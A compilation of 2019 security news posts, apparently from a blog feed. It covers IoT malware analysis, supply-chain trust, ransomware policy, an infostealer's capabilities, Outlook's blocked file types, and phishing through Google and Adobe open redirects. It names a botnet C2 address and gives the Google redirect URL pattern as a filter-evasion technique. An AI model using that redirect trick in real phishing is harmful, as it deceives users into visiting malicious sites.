When it comes to privacy, Europe has made enormous leaps to improve the trust of citizens in digital services, through more robust privacy rules and cybersecurity regulations and we hope that EU lawmakers continue to keep the safety of their constituents as a top priority. At McAfee, we believe you cannot have privacy without security, and that companies must proactively consider privacy and security on the drawing board and throughout the development process for products and services going to market.

But Cybersecurity is also about preparing for the future and in some cases, the best cyber-defences take a long time to develop, and nowhere is this more apparent than in the election interference and disinformation practices that sought to bring the recent EU elections, and our democratic foundations, to their knees.

The May 2019 elections may still be fresh in our memory, but Europe should not lose a second in starting to build its resilience for the next ones. At McAfee, we believe tackling disinformation requires robust cyber hygiene by all. But the best way to address it is using cyber intelligence and tradecraft to understand the adversary, so citizens can better understand the scale of the problem and our politicians can make the most informed decisions on how best to combat it.

McAfee has observed the growing prominence of Cybersecurity on the political agenda. This is a welcome and necessary development to ensure Europe is not taken off-guard by a cyber incident. Of course, Europe’s policymakers in the commission, parliament and council will pay attention to cyber threats when a crisis hits, but as John F Kennedy put it, they would also do well to repair the roof when the sun is shining. Whatever the cyber weather, McAfee will be a trusted partner to make Europe more cyber secure.

The post Opening up Europe’s Cyber Future appeared first on McAfee Blogs.

Exclusive: MalwareMustDie analyzes a new IoT malware dubbed Linux/ AirDropBot

After 2 years of waiting, MalwareMustDie returns with an excellent page of malware analysis of a new IoT malware: Linux/AirDropBot.

Yes, I have to confess, it was hard to wait all this time, but the reward it was worth it: unixfreaxjp is return, with a new, great page of reverse engeeniring published on the MalwareMustDie blog post: “MMD-0064-2019 – Linux/AirDropBot

And this is not only “the” Odisseus’s opinion, just because I can be addressed as a member of  MalwareMustDie crew: this last post IT IS a masterpiece technically speaking, because here unixfreaxjp reveals some unique and undocumented best practices in order to reverse Linux malware binaries (Intel and not Intel platforms), providing to every whitehat reverser many references and howtos to deal with ELF Linux malware, mixing theory and practice and showing how is incredibly useful the use of Radare r2 and Tsurgi distribution.

Don’t know if is because I have asked to my friend unixfreaxjp many times to publicly show how Radare r2 can be be used with great results, but after this post we can definitively state that, once again, Radare r2 has nothing to envy of the best commercial tools used in many reverse engineering tutorials that are available on Youtube.

In fact this time we have not a “simple” blog post, but a rich, strong and powerful technical lesson on how stripped binaries can be reversed even if they are “indeed” stripped.

Unixfreaxjp step by step leads the reader to understand how a malware code is build, which are the methods, which are the secrets, with are the hidden techniques used by the coders to hide and encrypt as much as possible the C2 address, how the operative commands coming from the C2 are parsed, and how almost everything can be reconstructed to get the source code back from any stripped binary.

The beginning of the story: another IoT malware in the wild?

But let’s go back to the beginning of the story when my very good friend @0xrb found in his honeypot this new “Mirai like” Linux malware, which has important differences with the Mirai implementation. He understood immediately that there was something strange in this new “Mirai variant”, to proposing the sample to MalwareMustDie team: here it is his early tweet.

It is possible to give a look also to the logs of the malware that @0xrb published on Pastebin: here a lot of information is made available during the running phase. One of them, for example, is the C2 server.

The C2 of the botnet was: 147.135.174.119

As unixfreaxjp states in his post, @0xrb has successfully submitted the sample to MalwareMustDie team in order to better analyze it, and the result is another great page of Linux malware reversing, that every malware analyst should read and re-read.

We will overfly the technical analysis because the MalwareMustDie post is extremely clear and explanatory in every single part of its analysis.

Coming to the core topic: IoT botnet threat and their ecosystem

New Linux developed malware aiming internet of things is happening a lot, and as previously mentioned, it has been driven by the money scheme that is fueling its botnet ecosystem as per previously posted in Security Affairs, this is still the main reason why new freshly coded malware in this sector is always coming up.

First spotted in the internet on August 3rd, 2019, a new Linux/AirDropBot has been reported, is a malware that has been built to aim many embedded Linux OS platform, it is meant to propagate its botnet into several originally coded and built for aiming the IoT used platforms. It’s still not in the final stage of development judging from some uncoded functions,  but the adversary mission is clear, to get as much Linux IoT infected as possible and get rid of his competitors. It was first detected as Mirai or Gafgyt like during the detection spotted in the first series of samples, and this may make researchers in Linux malware ignored its first existence.

So many processors are aimed by the malware, but if CPU like ARC Cores, Renesas SH, Motorola m68000, Altera Nios II, Tensilica Xtensa and Xilinx MicroBlaze CPU is aimed along with other generic cross-compiled CPU (MIPS/ARM/PPC/SPARC/Intel), the herder meant serious business to “pwn” the reachable IoTs. The binary is having two categories, the one that acts as bots and meant to infect the small devices and for bigger systems it has the worm-like vulnerability scanner aims CGI page on routers (in this version is aiming HTTP port 8080 on specific product CGI file) that can infect itself in a worm-like style along with the telnet scanning basis (attacking TCP port 23 or 2323).

The analysis made in MalwareMustDie blog’s recent post “MMD-0064-2019 – Linux/AirDropBot” is showing the latest binary sets, used by the adversaries behind this botnet. Scanner function for exploiting a certain router’s vulnerability is hardcoded and this threat is also aiming at other exploit too on older samples delivery. The overall idea is a known ones but the code is newly made.

Final considerations on the behavior to take in order to face this threat.

Internet of things are on improvement for its security quality, and governments all over the globe are seriously handling this, for example in the US the “Security Feature Recommendations for IoT Devices” by NIST is a good recommended plan, in the UK a voluntary code of practice (CoP) to help manufacturers boost the security of internet-connected devices that make up the internet of things (IoT) has been published, or in Japan the Project to Survey IoT Devices and to Alert Users has been started. Yet, there are a lot of products to handle and vulnerabilities for these products which are also researched at the same time by adversaries.
This makes IoT threat is still making a lot of issues since day-by-day new exploit issue actually comes up, old issues are re-used, unpatched segments are revealed and aimed.

Are we the wrong track then? I don’t think so. Yes, the process takes time and what we can do is keep on improving the detection on a new threat, containment, and response as prevention to strengthen the defense scheme for the platform, along with the parallel legal works on stopping adversaries. If we are committing to keep on doing these steps the adversaries will find more demerits than merits to keep on hammering is with their botnets.

About the Author: 

Odisseus – Independent Security Researcher involved in Italy and worldwide in topics related to hacking, penetration testing and development.

Pierluigi Paganini

(SecurityAffairs – AirDropBot, malware)

The post Exclusive: MalwareMustDie analyzes a new IoT malware dubbed Linux/ AirDropBot appeared first on Security Affairs.

Supply-Chain Security and Trust

The United States government's continuing disagreement with the Chinese company Huawei underscores a much larger problem with computer technologies in general: We have no choice but to trust them completely, and it's impossible to verify that they're trustworthy. Solving this problem ­ which is increasingly a national security issue ­ will require us to both make major policy changes and invent new technologies.

The Huawei problem is simple to explain. The company is based in China and subject to the rules and dictates of the Chinese government. The government could require Huawei to install back doors into the 5G routers it sells abroad, allowing the government to eavesdrop on communications or ­-- even worse ­-- take control of the routers during wartime. Since the United States will rely on those routers for all of its communications, we become vulnerable by building our 5G backbone on Huawei equipment.

It's obvious that we can't trust computer equipment from a country we don't trust, but the problem is much more pervasive than that. The computers and smartphones you use are not built in the United States. Their chips aren't made in the United States. The engineers who design and program them come from over a hundred countries. Thousands of people have the opportunity, acting alone, to slip a back door into the final product.

There's more. Open-source software packages are increasingly targeted by groups installing back doors. Fake apps in the Google Play store illustrate vulnerabilities in our software distribution systems. The NotPetya worm was distributed by a fraudulent update to a popular Ukranian accounting package, illustrating vulnerabilities in our update systems. Hardware chips can be back-doored at the point of fabrication, even if the design is secure. The National Security Agency exploited the shipping process to subvert Cisco routers intended for the Syrian telephone company. The overall problem is that of supply-chain security, because every part of the supply chain can be attacked.

And while nation-state threats like China and Huawei ­-- or Russia and the antivirus company Kaspersky a couple of years earlier ­-- make the news, many of the vulnerabilities I described above are being exploited by cybercriminals.

Policy solutions involve forcing companies to open their technical details to inspection, including the source code of their products and the designs of their hardware. Huawei and Kaspersky have offered this sort of openness as a way to demonstrate that they are trustworthy. This is not a worthless gesture, and it helps, but it's not nearly enough. Too many back doors can evade this kind of inspection.

Technical solutions fall into two basic categories, both currently beyond our reach. One is to improve the technical inspection processes for products whose designers provide source code and hardware design specifications, and for products that arrive without any transparency information at all. In both cases, we want to verify that the end product is secure and free of back doors. Sometimes we can do this for some classes of back doors: We can inspect source code ­ this is how a Linux back door was discovered and removed in 2003 ­ or the hardware design, which becomes a cleverness battle between attacker and defender.

This is an area that needs more research. Today, the advantage goes to the attacker. It's hard to ensure that the hardware and software you examine is the same as what you get, and it's too easy to create back doors that slip past inspection. And while we can find and correct some of these supply-chain attacks, we won't find them all. It's a needle-in-a-haystack problem, except we don't know what a needle looks like. We need technologies, possibly based on artificial intelligence, that can inspect systems more thoroughly and faster than humans can do. We need them quickly.

The other solution is to build a secure system, even though any of its parts can be subverted. This is what the former Deputy Director of National Intelligence Sue Gordon meant in April when she said about 5G, "You have to presume a dirty network." Or more precisely, can we solve this by building trustworthy systems out of untrustworthy parts?

It sounds ridiculous on its face, but the Internet itself was a solution to a similar problem: a reliable network built out of unreliable parts. This was the result of decades of research. That research continues today, and it's how we can have highly resilient distributed systems like Google's network even though none of the individual components are particularly good. It's also the philosophy behind much of the cybersecurity industry today: systems watching one another, looking for vulnerabilities and signs of attack.

Security is a lot harder than reliability. We don't even really know how to build secure systems out of secure parts, let alone out of parts and processes that we can't trust and that are almost certainly being subverted by governments and criminals around the world. Current security technologies are nowhere near good enough, though, to defend against these increasingly sophisticated attacks. So while this is an important part of the solution, and something we need to focus research on, it's not going to solve our near-term problems.

At the same time, all of these problems are getting worse as computers and networks become more critical to personal and national security. The value of 5G isn't for you to watch videos faster; it's for things talking to things without bothering you. These things ­-- cars, appliances, power plants, smart cities --­ increasingly affect the world in a direct physical manner. They're increasingly autonomous, using A.I. and other technologies to make decisions without human intervention. The risk from Chinese back doors into our networks and computers isn't that their government will listen in on our conversations; it's that they'll turn the power off or make all the cars crash into one another.

All of this doesn't leave us with many options for today's supply-chain problems. We still have to presume a dirty network ­-- as well as back-doored computers and phones -- and we can clean up only a fraction of the vulnerabilities. Citing the lack of non-Chinese alternatives for some of the communications hardware, already some are calling to abandon attempts to secure 5G from Chinese back doors and work on having secure American or European alternatives for 6G networks. It's not nearly enough to solve the problem, but it's a start.


Perhaps these half-solutions are the best we can do. Live with the problem today, and accelerate research to solve the problem for the future. These are research projects on a par with the Internet itself. They need government funding, like the Internet itself. And, also like the Internet, they're critical to national security.

Critically, these systems must be as secure as we can make them. As former FCC Commissioner Tom Wheeler has explained, there's a lot more to securing 5G than keeping Chinese equipment out of the network. This means we have to give up the fantasy that law enforcement can have back doors to aid criminal investigations without also weakening these systems. The world uses one network, and there can only be one answer: Either everyone gets to spy, or no one gets to spy. And as these systems become more critical to national security, a network secure from all eavesdroppers becomes more important.

This essay previously appeared in the New York Times.

Ransomware attacks against small towns require collective defense

There is a war hitting small-town America. Hackers are not only on our shores, but they’re in our water districts, in our regional hospitals, and in our 911 emergency systems. The target du jour of ransomware hackers is small towns and they have gone after them with a vengeance. Last month, the governor of Texas, Greg Abbott, declared a “Level 2 Escalated Response” as 22 of Texas’s cities were hit simultaneously with ransomware attacks, crippling … More

The post Ransomware attacks against small towns require collective defense appeared first on Help Net Security.

Senate Passes Ransomware Law

Senate Passes Ransomware Law

A new law has passed the US senate which will demand the federal government ramp up its support for organizations hit by ransomware.

The DHS Cyber Hunt and Incident Response Teams Act would require the Department of Homeland Security (DHS) to build dedicated teams tasked with providing advice to organizations on how best to protect their systems from attack, as well as other technical support, including incident response assistance.

Although the new capabilities would be available to all public and private organizations on request — including businesses, police departments, hospitals, and banks — senate minority leader Chuck Schumer focused on protection for New York state schools in his comments on the legislation.

“The Senate passing the DHS Cyber Hunt and Incident Response Teams Act is an important step in protecting upstate New York school districts from the swaths of ransomware attacks that take hostage the personal information and vital data of our students, school employees and local governments,” he said in a statement.

“It’s critical that we use all available resources to protect New York students from cyber crooks, and enhance and increase our resiliency to these attacks. I’m proud of the role I played in pushing this sorely-needed legislation through the senate and won’t stop working until it’s signed into law.”

One security vendor calculated last week that ransomware attacks have disrupted operations at 49 US school districts and educational institutions in the first nine months of the year, compromising potentially 500 K-12 schools versus just 11 last year.

This makes the sector the second most popular for ransomware attackers after local municipalities.

These have been battered by attacks over the past few months, with one campaign in Texas hitting 23 local government entities simultaneously.

A similar piece of legislation to the DHS Cyber Hunt and Incident Response Teams Act has already passed in the House of Representatives, so the two will now begin the reconciliation process.

Iran’s oil minister orders ‘Full Alert’ for oil sector on against attacks

Iran ‘s oil minister on Sunday ordered representatives of the energy sector to be on ‘full alert’ to the threat of “physical and cyber” attacks.

Iran’s oil minister, Bijan Namdar Zanganeh, ordered companies operating in the energy sector to be on ‘full alert’ to the threat of “physical and cyber” attacks.

it is necessary for all companies and installations the oil industry to be on full alert against physical and cyber threats,” reads a statement published on the oil ministry’s Shana website.

Iran fears a retaliation of Western countries that are accusing it to carry out physical and cyber attacks against their infrastructure and countries in the Middle East.

Iran’s oil ministry said that the Government of Washington has launched a full-scale economic war” against the Islamic republic.

In the middle-September, drone attacks hit two major oil facilities run by the state-owned company Aramco in Saudi Arabia, one of them is the Abqaiq site.

Iran-backed Houthi rebels in Yemen claimed responsibility for the attacks on the Abqaiq plant, according to a spokesman for the group in Yemen, it had deployed 10 drones in the attacks.

The group is threatening Saudi Arabia of further attacks. The Iran-aligned Houthi rebel movement fights the Yemeni government and a coalition of regional countries led by Saudi Arabia that fights the rebels since 2015, when President Abdrabbuh Mansour Hadi was was kicked out of Sanaa by the Houthis.

Secretary of State Mike Pompeo blamed Iran for coordinated the attacks, it added that we are facing an unprecedented attack on the world’s energy supply.

Riyadh, Berlin, London, and Paris also blame Teheran for attacks that caused severe damages to the Saudi oil sector on September 14.

Iran denied any involvement in the attacks. Immediately after the attacks, US President Donald Trump announced that his country was preparing a response. President Trump opted out for an intensification of economic sanctions against Teheran.

Military and intelligence experts believe that western coalition, driven by the US could carry out a series of cyber attacks against Iranian critical infrastructure. A few days after the drone attacks, some western media reported destructive cyber attacks against infrastructures in the Iranian oil sector, but Iran denied it.

“Contrary to Western media claims, investigations done today show no successful cyber attack was made on the country’s oil installations and other crucial infrastructure,” reads a statement published by the government’s cyber security office.

Despite the statement, security experts believe that a cyber offensive against Iranian infrastructure is onoing.

Pierluigi Paganini

(SecurityAffairs – Iran, oil sector)

The post Iran’s oil minister orders ‘Full Alert’ for oil sector on against attacks appeared first on Security Affairs.

Airbus Suppliers Hit in State-Sponsored Attack

Airbus Suppliers Hit in State-Sponsored Attack

Airbus has been forced to take action after a possible Chinese state-sponsored hacking operation was detected targeting multiple suppliers over the past year, according to reports.

The commercial and military aircraft-maker revealed in January that it suffered a cyber-attack resulting in unauthorized access to data, but this campaign is thought to be much bigger in scope.

Hackers have targeted UK engine-maker Rolls Royce and French tech supplier Expleo, as well as two other French Airbus suppliers, although none of the organizations confirmed the news to AFP.

Unnamed “security sources” told the newswire that the “sophisticated” attack on the companies focused on compromising the VPNs connecting them with Airbus networks.

The sources claimed that the hackers were after technical documentation regarding the certification process for parts of Airbus aircraft, while other stolen docs indicated interest in the A400M military transport plane, and the A350 propulsion and avionics systems.

These are areas Chinese aircraft manufacturers are thought to be relatively weak in, while state-backed Comac is said to be struggling to gain certification for its C919 commercial airliner.

The notorious APT10 and the Jiangsu outpost of the Ministry of State Security, known as JSSD, have both been pegged as possible perpetrators.

“Our national security is at risk and it's well past time to address this challenge with leadership and resources,” argued Jake Olcott, VP of government affairs at BitSight. “The entire defense supply chain has been under attack for years, and it's not just the small companies that are vulnerable. Defense agencies must gain visibility immediately. We can't afford to wait.”

Ilia Kolochenko, CEO of web security firm ImmuniWeb, added that third party risk management is still at an early stage in many organizations.

“The situation is largely exacerbated by different national and regional standards and best practices, often incompatible or contrariwise overlapping,” he argued.

“Globally recognized standards, such as ISO 27001, 27701 and 9001, can definitely ensure a baseline of security, privacy and quality assurance amid suppliers. One should, however, bear in mind that they are no silver bullet and some additional monitoring of suppliers handling critical business data is a requisite.”

Microsoft to block 40+ additional file extensions in Outlook on the web

Microsoft is planning to block by default 40+ new file types in Outlook on the web to improve the security for their customers. “We took the time to audit the existing blocked file list and update it to better reflect the file types we see as risks today,” the Exchange Team noted. Outlook on the web and blocked attachments Outlook on the web, formerly Outlook Web Access (OWA), is a personal information manager web app … More

The post Microsoft to block 40+ additional file extensions in Outlook on the web appeared first on Help Net Security.

Microsoft Launches CyberPeace Institute to Tackle Attacks

Microsoft Launches CyberPeace Institute to Tackle Attacks

Microsoft and others have launched a new non-profit which aims to reduce the “frequency, impact and scale” of cyber-attacks on citizens and critical infrastructure (CNI).

The Hewlett Foundation and Mastercard, alongside other unnamed “leading organizations,” have joined Microsoft as initial funders of the CyberPeace Institute.

Its three core functions are to: help and defend civilian victims of cyber-attacks, including by mobilizing a new CyberVolunteer Network, analyze and investigate attacks, to raise understanding and drive global accountability and promote cybersecurity norms of responsible behavior by nation states.

“The escalating attacks we’ve seen in recent years are not just about computers attacking computers – these attacks threaten and often harm the lives and livelihoods of real people, including their ability to access basic services like heath care, banking and electricity,” argued Microsoft corporate vice president, Tom Burt.

“For years, non-governmental organizations around the world have provided on-the-ground help and vocal advocacy for victims of wars and natural disasters, and have convened important discussions about protecting the victims they serve. It’s become clear that victims of attacks originating on the internet deserve similar assistance, and the CyberPeace Institute will do just that.”

The Geneva-based organization will be headed up by President Marietje Schaake, former member of the European Parliament and international policy director at Stanford university’s Cyber Policy Center and CEO Stéphane Duguin, head of the European Internet Referral Unit at Europol.

The institute joins other recent initiatives designed to tackle the global challenge of cybercrime and incidents impacting CNI, including: the Cybersecurity Tech Accord, which has signed up more than 100 companies and the Paris Peace Call for Trust & Security in Cyberspace, which now has signatories from 67 countries, 139 international and civil society organizations, and 358 private organizations.

Arcane Stealer V, a threat for lower-skilled adversaries that scares experts

Experts recently analyzed an information-stealing malware tracked as Arcane Stealer V that is very cheap and easy to buy in the Dark Web.

In July 2019, researchers at Fidelis Threat Research Team (TRT) analyzed a sample of Arcane Stealer V, a .net information-stealing malware that is easy to acquire in the dark web. The author of the malware is selling it on his own website and on the Lolzteam site on the Dark Web, the researchers also found cracked versions on multiple community discussion and file-sharing platforms.

The malware is quite cheap, it goes for just $9 on the Dark Web, and could be also used by lower-skilled adversaries. Due to the low-cost of the malware, experts believe that its popularity could rapidly increase.

“The Arcane Stealer is a .net information stealer. The malware is available as a graphical user interface (GUI) or users can purchase the code, making it easier for actors with novice skills to employ. It sells for 699 Rubles or approximately 9 US dollars.” reads the post published by the researchers. “There is also support available on Telegram along with other “helpful” bots.”

In early August, the researchers were able to track multiple instant messenger and social media accounts associated with a Russian-language actor that might be the author of the malware.

The malware is able to collect various data from victims, including operating system, browser information, cryptocurrency wallets and instant-messaging sessions from Telegram, Discord, and Pidgin, data (i.e. passwords, cookies and forms) from a several of browsers, including Chrome, Opera, Kometa, Orbitum, Comodo, Amigo, Torch and Yandex.

Arcane Stealer V could be used to steal documents, collect Steam gaming community data, logs detected virtual machine IPs, and data from FileZilla servers.

The threat actor behind the Arcane Stealer V also provides dashboards and statistics to show crooks that buy the malware the potential earnings.

Arcane Stealer V

When the malware runs, it takes a screenshot and then it creates a text log file of what was collected.

“When ran, the file collects data, takes a screenshot and then it creates a text log file of what was collected. It stores all of the information in a folder in %appdata%/local/{hwid}/.” continues the post. ” It uses the assigned hardware ID that the malware generates as the folder name and zip folder name.”

Then the malware sends the zipped file to the C2 server.

The researchers identified multiple Telegram and Twitter accounts with the handles “@arcanee_bot,” “@es3n1n” and “@SakariHack,” that were used to discuss how to build and distribute the malware. These accounts were all associated with the same Russian-language actor, a 21-year-old man that says to suffer a form of epilepsy.

“The actor associated with the malware appears to be a native Russian speaker, however it is unclear if the actor is currently located in Russia,” continues the analysis. “The actor’s information-stealer does not appear to limit potential targets. Analysts have observed the capability of Russian sites to be targeted in the malware.”

Experts pointed out that the malware unlike other threats doesn’t discriminate geo-location of the victims and could be used against any target.

“Based off current observation and analysis, Arcane Stealer and its developer(s) appear to be low-level threats.” conclude the experts.

“Due to the lack of traversal, propagation, or destructive capabilities at the time of analysis, it is assessed with moderate confidence that this malware may not become popular with high-value and highly capable actors. However, because users can buy the source code, it is possible that we may see other threat actors reusing the malware and creating their own variant of Arcane V, as has been done with other popular malware families, like njRAT.”

Pierluigi Paganini

(SecurityAffairs – Arcane Stealer V, malware)

The post Arcane Stealer V, a threat for lower-skilled adversaries that scares experts appeared first on Security Affairs.

10 Respected Providers of IT Security Training

We at The State of Security are committed to helping aspiring information security professionals reach their full potential. Towards that end, we compiled a list of the top 10 highest paying jobs in the industry. We even highlighted the U.S. cities that tend to reward security personnel with the best salaries, amenities and other benefits. […]… Read More

The post 10 Respected Providers of IT Security Training appeared first on The State of Security.

Microsoft will add new file types to the list of blocked ones in Outlook on the Web

Microsoft announced last week it is going to expand the list of file extensions that are blocked in Outlook on the web.

Microsoft announced that it will immediately block other file extensions for its Outlook web users, it will impossible for them to download this type of attachments.

Microsoft pointed out that the newly blocked file types are rarely used, this means that most organizations will face no problems with the change.

The list of file types that will be blocked by Microsoft include ones used by popular programing languages such as “.py“, “.pyc“, “.pyo“, “.pyw“, “.pyz“, “.pyzw” (used by Python); “.ps1″, “.ps1xml”, “.ps2″, “.ps2xml”, “.psc1″, “.psc2″, “.psd1″, “.psdm1″, “.psd1″, “.psdm1″, “.cdxml” and “.pssc” (used by PowerShell); and “.jar” and “.jnlp” (used by Java).

Microsoft announced it will block also “.appcontent-ms“, “.settingcontent-ms“, “.cnt“, “.hpj“, “.website”, “.webpnp“, “.mcf“, “.printerexport“, “.pl“, “.theme”, “.vbp“, “.xbap“, “.xll“, “.xnk“, “.msu“, “.diagcab” and “.grp“.

Other file types that will be blocked by the tech giant are the ones having the “.appref-ms” extension used by Windows ClickOnce, the “.udl” extension used by Microsoft Data Access Components (MDAC), the “.wsb” extension used by Windows sandbox, and the “.cer“, “.crt” and “.der” extensions associated with digital certificates.

“The following extensions are used by various applications.” reads the post published by Microsoft.”While the associated vulnerabilities have been patched (for years, in most cases), they are being blocked for the benefit of organizations that might still have older versions of the application software in use:

“.appcontent-ms”, “.settingcontent-ms”, “.cnt”, “.hpj”, “.website”, “.webpnp”, “.mcf”, “.printerexport”, “.pl”, “.theme”, “.vbp”, “.xbap”, “.xll”, “.xnk”, “.msu”, “.diagcab”, “.grp”

In case organizations have to allow for the use of a particular file type, admins could add specific extensions to the AllowedFileTypes property of users’ OwaMailboxPolicy objects.

“If you want a particular file type to be allowed, you can add that file type to the AllowedFileTypes property of your users’ OwaMailboxPolicy objects.” continues the post. “To add a file extension to the AllowedFileTypes list:

$policy = Get-OwaMailboxPolicy [policy name]
$allowedFileTypes = $policy.AllowedFileTypes
$allowedFileTypes.Add(".foo")
Set-OwaMailboxPolicy $policy -AllowedFileTypes $allowedFileTypes

“Security of our customer’s data is our utmost priority, and we hope our customers will understand and appreciate this change. Change can be disruptive, so we hope the information here explains what we’re doing and why,” Microsoft concludes.

Pierluigi Paganini

(SecurityAffairs – Outlook, hacking)

The post Microsoft will add new file types to the list of blocked ones in Outlook on the Web appeared first on Security Affairs.

How long before quantum computers break encryption?

The verdict is in: quantum computing poses an existential threat to asymmetric cryptography algorithms like RSA and ECC that underpin practically all current Internet security. This comes straight from the National Academy of Science’s Committee on Technical Assessment of the Feasibility and Implications of Quantum Computing. The inevitable follow-up: OK, so how much time do we have before we’re living in a post-quantum world? The short answer is, nobody knows. That’s not for lack of … More

The post How long before quantum computers break encryption? appeared first on Help Net Security.

A proactive approach to cybersecurity requires the right tools, not more tools

The key challenge facing security leaders and putting their organizations at risk of breach is misplaced confidence that the abundance of technology investments they have made has strengthened their security posture, according to a study conducted by Forrester Consulting. The study surveyed over 250 senior security decision-makers in North America and Europe. Participants included CISO, CIO, IT and security VPs from organizations ranging from 3,000 to over 25,000 employees. Currently, security leaders employ a variety … More

The post A proactive approach to cybersecurity requires the right tools, not more tools appeared first on Help Net Security.

Companies vastly overestimating their GDPR readiness, only 28% achieving compliance

Over a year on from the introduction of the General Data Protection Regulation (GDPR), the Capgemini Research Institute has found that companies vastly overestimated their readiness for the new regulation with just 28% having successfully achieved compliance. This is compared to a GDPR readiness survey last year which found that 78% expected to be prepared by the time the regulation came into effect in May 2018. However, organizations are realizing the benefits of being compliant: … More

The post Companies vastly overestimating their GDPR readiness, only 28% achieving compliance appeared first on Help Net Security.

Weekly Update 158

Weekly Update 158

It's been a bit of intense country-hopping since the last update so this one is a consolidated "this week in tweets" version. I actually found it kind of interesting going back through the noteworthy incidents of the week in lieu of having original content of my own, see what you think. Given the coming schedule (and a deep, deep desire for a few days of downtime), the next one might be more of the same so I hope it resonates!

Weekly Update 158
Weekly Update 158
Weekly Update 158

References

Because this week is predominantly about noteworthy tweets, I'm going to do the references a little differently. Firstly, with a sponsor shout-out:

Sponsored by Okta: You wouldn’t roll your own hashing algorithm, so why build your own auth? Secure users in mins with a free dev account.

And then the tweets I discussed themselves:

DevSecOps is emerging as the main methodology for securing cloud-native applications

Only 8 percent of companies are securing 75 percent or more of their cloud-native applications with DevSecOps practices today, with that number jumping to 68 percent of companies securing 75 percent or more of their cloud-native applications with DevSecOps practices in two years, according to ESG. The study results also revealed that API-related vulnerabilities are the top threat concern (63 percent of respondents) when it comes to organizations use of serverless. Overall, the study analyzed … More

The post DevSecOps is emerging as the main methodology for securing cloud-native applications appeared first on Help Net Security.

ThreatConnect Platform: Security insight for sound decision-making

In this interview, Jason Spies, VP of Engineering & Chief Architect, ThreatConnect, talks about the powerful features of the ThreatConnect Platform. Oftentimes, the ability for a product to support growth (scale effectively) is forgotten in lieu of a customer being dazzled by individual features or capabilities. Can you talk about the importance of technical considerations when it comes to a Platform scaling to support multiple teams and growing demands overtime? Bottom line, it’s a balance … More

The post ThreatConnect Platform: Security insight for sound decision-making appeared first on Help Net Security.

eBook: The DevOps Roadmap for Security

DevOps is concerned with uniting two particular tribes: development and operations. These tribes have seemingly competing priorities: developers value features while operations value stability. These contradictions are largely mitigated by DevOps. A strong argument could be made that the values of the security tribe – defensibility – could just as easily be brought into the fold, forming a triumvirate under the DevSecOps umbrella. The security tribe’s way forward is to find ways to unify with … More

The post eBook: The DevOps Roadmap for Security appeared first on Help Net Security.

SecTor 2019 Hack Lab Sneak Peak

Fall is officially here, and that can only mean that SecTor is right around the corner! All summer long, I’ve been planning and prepping new ideas for this year’s IoT Hack Lab and training session. With just a few weeks to go until the conference kicks off, I’m more than a little excited about the […]… Read More

The post SecTor 2019 Hack Lab Sneak Peak appeared first on The State of Security.

Ideas and Innovations at DEFCON 2019

Every year when I go to Black Hat USA and DEFCON, I am reminded of the constant battle between light and dark…wait…that’s Return of the Jedi…. I mean of the constant battle between infosec and the big bad hacker. And it’s not just the uber sophisticated hacks that involve fuzzing and SQL Injections (Am I […]… Read More

The post Ideas and Innovations at DEFCON 2019 appeared first on The State of Security.

Cloudflare now supports HTTP/3

Cloudflare, the security, performance, and reliability company helping to build a better Internet, announced support for HTTP/3, the new standard of the web that will make the Internet faster, more secure, and more reliable, for everyone. Cloudflare has been collaborating with industry peers, including Google Chrome and Mozilla Firefox, to bring HTTP/3 to the masses and progress the Internet into the future. An efficient Internet requires the adoption of common, shared protocols to allow computers … More

The post Cloudflare now supports HTTP/3 appeared first on Help Net Security.

MobileIron to offer robust security and management to Oculus for Business

MobileIron, the company that introduced the industry’s first mobile-centric, zero trust platform for the enterprise, announced support for the upcoming release of Oculus for Business. Organizations will be able to onboard, configure and manage Oculus’ leading all-in-one virtual reality (VR) headsets, Oculus Quest and Oculus Go, as part of their established unified endpoint management (UEM) infrastructure, simplifying the entire device lifecycle – from enrollment to retirement. Built for easy adoption and scalability across a variety … More

The post MobileIron to offer robust security and management to Oculus for Business appeared first on Help Net Security.

HITRUST adds new features to its information risk and compliance assessment SaaS platform

HITRUST, a leading data protection standards development and certification organization, announced a significant new release of its information risk and compliance assessment SaaS platform. HITRUST is continually innovating MyCSF to help streamline and simplify how organizations assess information risk and manage compliance. The October 2019 release features a redesigned user interface, capability to create custom assessments tailored to specific regulatory or control requirements, streamlined workflows throughout the third-party assurance process, and sharing of assessments with … More

The post HITRUST adds new features to its information risk and compliance assessment SaaS platform appeared first on Help Net Security.

Tripwire unveils new version of Tripwire Connect

Tripwire, a leading global provider of security and compliance solutions for enterprises and industrial organizations, announced the next generation of Tripwire Connect, which consolidates data from both Tripwire Enterprise and Tripwire IP360 to provide a single view of security and compliance states, and can be deployed both on-premises and as a software-as-a-service (SaaS) application. The new version of the Tripwire Connect analytics, reporting, integration and management platform delivers scalable, flexible and centralized vision into the … More

The post Tripwire unveils new version of Tripwire Connect appeared first on Help Net Security.

OPSWAT launches OPSWAT Academy, a new CIP cybersecurity training and certification program

OPSWAT, a leader in critical infrastructure protection, announced a new critical infrastructure protection (CIP) cybersecurity training and certification program, OPSWAT Academy. Designed for cybersecurity professionals and CIP stakeholders, OPSWAT Academy will provide beginner, intermediate and advanced education strategically designed to reflect the real-world responsibilities and technical proficiencies required of modern-day critical infrastructure security professionals and stakeholders. Through courses that promote best practices and practical approaches to CIP cybersecurity, OPSWAT Academy will help properly prime what … More

The post OPSWAT launches OPSWAT Academy, a new CIP cybersecurity training and certification program appeared first on Help Net Security.

Phishers continue to abuse Adobe and Google Open Redirects

Adobe and Google Open Redirects Abused by Phishing Campaigns

Experts reported that phishing campaigns are leveraging Google and Adobe open redirects to bypass spam filters and redirect users to malicious sites.

Phishers are abusing Google and Adobe open redirects to bypass spam filters and redirect users to malicious sites.

Crooks abuse Google and Adobe services to create URLs that point to malicious websites that anyway are able to bypass security filters because they appear as legitimate URLs from trusted IT giants.

“Open redirectors take you from a Google URL to another website chosen by whoever constructed the link. Some members of the security community argue that the redirectors aid phishing, because users may be inclined to trust the mouse hover tooltip on a link and then fail to examine the address bar once the navigation takes place. reads the post published by Google.

“Our take on this is that tooltips are not a reliable security indicator, and can be tampered with in many ways; so, we invest in technologies to detect and alert users about phishing and abuse, but we generally hold that a small number of properly monitored offers fairly clear benefits and poses very little practical risk.”

An example of Google open redirect is https://www.google.com/url?q=[url] that could be abused by attackers.

“Phishing campaigns commonly utilize open redirects from well known companies as they feel users will be more likely to click on a link if it belongs to Google or Adobe.” reported BleepingComputer.

Below an example of a phishing message that uses Google open redirect that points to a fake login page.

In a similar way, attackers could abuse the Adobe redirect service in phishing campaigns.

Experts suggest administrators and users remain vigilant on open redirects.

Pierluigi Paganini

